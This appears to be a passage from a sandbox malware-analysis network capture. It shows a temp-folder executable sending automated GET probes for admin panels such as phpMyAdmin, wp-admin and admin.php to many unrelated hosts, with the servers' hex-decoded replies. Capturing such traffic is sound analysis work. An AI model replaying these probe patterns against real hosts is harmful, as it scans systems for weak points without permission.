2023-11-30 10:22:45 UTC	1997	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 45 43 4f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 20 34 30 30 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="Generator" content="NOWECO"><meta name="description" content="Error 400"><title>Error 404</title><li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	51389	194.63.248.47	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	168	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:45 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:45 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	51115	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	168	OUT	GET /admin.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	249	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:45 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
2023-11-30 10:22:45 UTC	27	IN	Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	52229	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	277	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:45 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	51110	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:45 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	51805	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:22:45 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:45 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	52004	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:45 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	52324	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	276	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:45 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	54273	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	163	OUT	GET /pma/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:46 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:46 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	56040	13.248.169.48	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:45 UTC	237	OUT	GET /admin.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	719	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:46 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:46 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	56056	15.197.204.56	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:46 UTC	231	OUT	GET /admin HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:46 UTC	716	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:46 